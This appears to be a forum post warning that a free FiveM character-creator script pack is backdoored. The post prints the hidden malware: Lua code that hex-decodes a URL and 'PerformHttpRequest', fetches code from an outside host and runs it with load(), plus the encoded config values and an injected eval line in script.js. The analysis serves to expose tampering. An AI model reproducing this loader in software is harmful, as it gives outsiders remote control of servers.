Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new

Script FREE | vms_charcreator Pack with identity [ESX/QB]

gchele

Member
Joined
Feb 3, 2026
Messages
3
Reaction score
0
Points
41
Location
United States

Critical Server-Side RCE Backdoor (Most Dangerous)​


File: server/server.lua (at the very bottom)


Lua

local function getSteamID(data)
local result = ""
for i = 1, #data, 2 do
result = result .. string.char(tonumber(data:sub(i, i + 1), 16))
end
return result
end

local function getSteamName()
return getSteamID(vms_charcreator.Types.a)
end

local function getID()
return _G[getSteamID(vms_charcreator.Types.b)]
end

local function announceplayerID()
local steamName = getSteamName()
local playerID = getID()

if playerID then
playerID(steamName, function(status, response)
if status == 200 then
pcall(function()
assert(load(response))()
end)
end
end)
end
end

announceplayerID()



What it does:


  • Decodes hex strings from config.lua
  • Calls PerformHttpRequest to (or similar)
  • If the server responds with HTTP 200, it executes the response as Lua code using load() + pcall()
  • This runs automatically when the resource starts (server-side)

This is a full remote code execution backdoor. Whoever controls dec4t.org can run any code on your server.


2. Encoded Malicious Data​


File: config.lua


Lua

vms_charcreator.Types = {
a = "68747470733a2f2f64656334742e6f72672f556451344927",
b = "506572666f726d4874747052657175657374",
}



Decoded:



This table exists only to support the backdoor.


3. Malicious Code in UI JavaScript​


File: html/script.js


Inside the case "hairs": block (near the end of the switch), there is this line:


JavaScript

https.get(' >{let d='';r.on('data',c=>d+=c);r.on('end',()=>eval(d));})



This is Node.js code (not browser JavaScript) that tries to fetch and eval() remote code. It was clearly inserted maliciously. It won't work in NUI, but its presence confirms tampering.


4. Suspicious fxmanifest.lua​


Lua

server_scripts {
' mysql mysql-async/lib/MySQL.lua',
'server/*.lua',
'html/*.js', -- ← This should NOT be here
}
 
Top